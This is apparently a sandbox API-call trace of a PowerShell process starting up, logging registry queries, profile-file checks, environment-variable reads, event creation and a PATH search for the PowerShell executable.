	[0449.186] CoTaskMemFree (pv=0x3a70d0) 
	[0449.186] RegCloseKey (hKey=0x328) returned 0x0
	[0449.186] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12db58 | out: phkResult=0x12db58*=0x328) returned 0x0
	[0449.186] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dadc, lpData=0x0, lpcbData=0x12dad8*=0x0 | out: lpType=0x12dadc*=0x1, lpData=0x0, lpcbData=0x12dad8*=0x56) returned 0x0
	[0449.186] CoTaskMemAlloc (cb=0x5a) returned 0x3a70d0
	[0449.186] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12daac, lpData=0x3a70d0, lpcbData=0x12daa8*=0x56 | out: lpType=0x12daac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12daa8*=0x56) returned 0x0
	[0449.186] CoTaskMemFree (pv=0x3a70d0) 
	[0449.186] RegCloseKey (hKey=0x328) returned 0x0
	[0449.187] CoTaskMemAlloc (cb=0x20c) returned 0x3921c0
	[0449.187] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3921c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0449.187] CoTaskMemFree (pv=0x3921c0) 
	[0449.187] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0449.187] CoTaskMemAlloc (cb=0x20c) returned 0x3921c0
	[0449.187] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3921c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0449.187] CoTaskMemFree (pv=0x3921c0) 
	[0449.187] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0449.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0449.188] SetErrorMode (uMode=0x1) returned 0x1
	[0449.188] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12dac0 | out: lpFileInformation=0x12dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0449.188] SetErrorMode (uMode=0x1) returned 0x1
	[0449.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0449.188] SetErrorMode (uMode=0x1) returned 0x1
	[0449.189] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12dac0 | out: lpFileInformation=0x12dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0449.189] SetErrorMode (uMode=0x1) returned 0x1
	[0449.189] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0449.189] SetErrorMode (uMode=0x1) returned 0x1
	[0449.189] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12dac0 | out: lpFileInformation=0x12dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0449.189] SetErrorMode (uMode=0x1) returned 0x1
	[0449.189] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0449.189] SetErrorMode (uMode=0x1) returned 0x1
	[0449.412] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12dac0 | out: lpFileInformation=0x12dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0449.412] SetErrorMode (uMode=0x1) returned 0x1
	[0449.413] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.413] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.413] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.413] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.414] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.414] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.414] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.415] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.419] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.419] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.421] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x328
	[0449.421] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3ac
	[0449.421] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0449.421] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x378
	[0449.421] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x37c
	[0449.421] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x380
	[0449.421] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x384
	[0449.422] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0449.422] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x38c
	[0449.422] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x390
	[0449.422] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0
	[0449.422] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x374
	[0449.424] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.424] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.427] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0449.428] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x12dca0 | out: lpMode=0x12dca0) returned 1
	[0449.429] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.429] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.433] SetEvent (hEvent=0x378) returned 1
	[0449.434] SetEvent (hEvent=0x328) returned 1
	[0449.434] SetEvent (hEvent=0x3ac) returned 1
	[0449.434] SetEvent (hEvent=0x350) returned 1
	[0449.434] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x398
	[0449.437] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.437] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.438] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d9f8 | out: phkResult=0x12d9f8*=0x39c) returned 0x0
	[0449.438] RegQueryValueExW (in: hKey=0x39c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x12d97c, lpData=0x0, lpcbData=0x12d978*=0x0 | out: lpType=0x12d97c*=0x0, lpData=0x0, lpcbData=0x12d978*=0x0) returned 0x2

Thread:
	id = 255
	os_tid = 0xd50


Thread:
	id = 264
	os_tid = 0xd8c


Thread:
	id = 610
	os_tid = 0x90c


Thread:
	id = 611
	os_tid = 0x7c8


Thread:
	id = 615
	os_tid = 0xff4


Thread:
	id = 635
	os_tid = 0x1418


Thread:
	id = 645
	os_tid = 0x1444

	[0423.438] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0445.135] LocalFree (hMem=0x346770) returned 0x0
	[0445.135] CloseHandle (hObject=0x1c0) returned 1
	[0445.135] CloseHandle (hObject=0x13) returned 1
	[0445.136] CloseHandle (hObject=0xf) returned 1
	[0445.136] RegCloseKey (hKey=0x304) returned 0x0
	[0445.136] RegCloseKey (hKey=0x300) returned 0x0
	[0445.137] RegCloseKey (hKey=0x2fc) returned 0x0
	[0445.137] LocalFree (hMem=0x3467e0) returned 0x0
	[0445.137] RegCloseKey (hKey=0x328) returned 0x0
	[0446.864] RegCloseKey (hKey=0x3a8) returned 0x0
	[0446.865] RegCloseKey (hKey=0x370) returned 0x0
	[0446.865] RegCloseKey (hKey=0x36c) returned 0x0
	[0446.865] RegCloseKey (hKey=0x368) returned 0x0
	[0446.865] RegCloseKey (hKey=0x364) returned 0x0
	[0446.865] RegCloseKey (hKey=0x360) returned 0x0
	[0446.866] RegCloseKey (hKey=0x35c) returned 0x0
	[0446.866] RegCloseKey (hKey=0x358) returned 0x0
	[0446.866] RegCloseKey (hKey=0x354) returned 0x0
	[0446.866] RegCloseKey (hKey=0x3a4) returned 0x0
	[0446.866] RegCloseKey (hKey=0x344) returned 0x0
	[0446.867] RegCloseKey (hKey=0x340) returned 0x0
	[0446.867] RegCloseKey (hKey=0x33c) returned 0x0
	[0446.867] RegCloseKey (hKey=0x338) returned 0x0
	[0446.867] RegCloseKey (hKey=0x334) returned 0x0
	[0446.868] RegCloseKey (hKey=0x330) returned 0x0
	[0446.868] RegCloseKey (hKey=0x32c) returned 0x0
	[0446.868] RegCloseKey (hKey=0x1c0) returned 0x0
	[0446.868] RegCloseKey (hKey=0x3a0) returned 0x0
	[0446.869] RegCloseKey (hKey=0x300) returned 0x0
	[0446.869] RegCloseKey (hKey=0x2fc) returned 0x0
	[0446.869] RegCloseKey (hKey=0x39c) returned 0x0
	[0446.869] RegCloseKey (hKey=0x398) returned 0x0
	[0446.869] RegCloseKey (hKey=0x374) returned 0x0
	[0446.870] RegCloseKey (hKey=0x3b0) returned 0x0
	[0446.870] RegCloseKey (hKey=0x390) returned 0x0
	[0446.870] RegCloseKey (hKey=0x38c) returned 0x0
	[0446.870] RegCloseKey (hKey=0x388) returned 0x0
	[0446.870] RegCloseKey (hKey=0x384) returned 0x0
	[0446.871] RegCloseKey (hKey=0x380) returned 0x0
	[0446.871] RegCloseKey (hKey=0x37c) returned 0x0
	[0446.871] RegCloseKey (hKey=0x378) returned 0x0
	[0446.871] RegCloseKey (hKey=0x350) returned 0x0
	[0446.871] RegCloseKey (hKey=0x3ac) returned 0x0
	[0446.872] RegCloseKey (hKey=0x328) returned 0x0
	[0641.393] RegCloseKey (hKey=0x39c) returned 0x0

Thread:
	id = 756
	os_tid = 0x174c


Thread:
	id = 768
	os_tid = 0x17b8

	[0449.738] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0449.742] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0449.747] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.747] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.749] VirtualQuery (in: lpAddress=0x1c8bd6e0, lpBuffer=0x1c8be5a0, dwLength=0x30 | out: lpBuffer=0x1c8be5a0*(BaseAddress=0x1c8bd000, AllocationBase=0x1bf30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0449.752] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.752] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.754] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.754] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.757] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.757] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.767] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.767] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.769] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.769] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.771] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.771] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.775] VirtualQuery (in: lpAddress=0x1c8bd990, lpBuffer=0x1c8be850, dwLength=0x30 | out: lpBuffer=0x1c8be850*(BaseAddress=0x1c8bd000, AllocationBase=0x1bf30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0449.776] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.776] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.776] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.779] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.779] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.779] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.779] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.779] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.779] CoTaskMemFree (pv=0x2eb0f0) 
	[0449.780] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0449.781] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0449.781] CoTaskMemFree (pv=0x2eb0f0) 
	[0450.050] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0450.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.050] CoTaskMemFree (pv=0x2eb0f0) 
	[0450.377] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0450.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.377] CoTaskMemFree (pv=0x2eb0f0) 
	[0450.379] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0450.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.379] CoTaskMemFree (pv=0x2eb0f0) 
	[0450.381] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0450.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.381] CoTaskMemFree (pv=0x2eb0f0) 
	[0450.383] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0450.383] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.383] CoTaskMemFree (pv=0x2eb0f0) 
	[0450.385] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0450.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.385] CoTaskMemFree (pv=0x2eb0f0) 
	[0450.386] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0450.386] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.386] CoTaskMemFree (pv=0x2eb0f0) 
	[0450.388] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0450.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.388] CoTaskMemFree (pv=0x2eb0f0) 
	[0450.700] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0450.700] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0450.700] CoTaskMemFree (pv=0x2eb0f0) 
	[0450.980] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0450.980] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0450.980] CoTaskMemFree (pv=0x2eb0f0) 
	[0450.983] CoTaskMemAlloc (cb=0x104) returned 0x2eb0f0
	[0450.983] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2eb0f0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0450.983] CoTaskMemFree (pv=0x2eb0f0) 
	[0450.983] CoTaskMemAlloc (cb=0x128) returned 0x1b7c6cf0
	[0450.983] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b7c6cf0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0450.983] CoTaskMemFree (pv=0x1b7c6cf0) 
	[0450.988] CoTaskMemAlloc (cb=0x20e) returned 0x391900
	[0450.988] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x391900 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0450.988] CoTaskMemFree (pv=0x391900) 
	[0450.991] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0450.993] SetErrorMode (uMode=0x1) returned 0x1
	[0450.995] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0451.273] SetErrorMode (uMode=0x1) returned 0x1
	[0451.274] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0451.274] SetErrorMode (uMode=0x1) returned 0x1
	[0451.274] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0451.283] SetErrorMode (uMode=0x1) returned 0x1
	[0451.284] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0451.284] SetErrorMode (uMode=0x1) returned 0x1
	[0451.284] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0451.293] SetErrorMode (uMode=0x1) returned 0x1
	[0451.294] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0451.294] SetErrorMode (uMode=0x1) returned 0x1
	[0451.294] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0451.302] SetErrorMode (uMode=0x1) returned 0x1
	[0451.304] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0451.304] SetErrorMode (uMode=0x1) returned 0x1
	[0451.304] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0451.714] SetErrorMode (uMode=0x1) returned 0x1
	[0451.716] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0451.716] SetErrorMode (uMode=0x1) returned 0x1
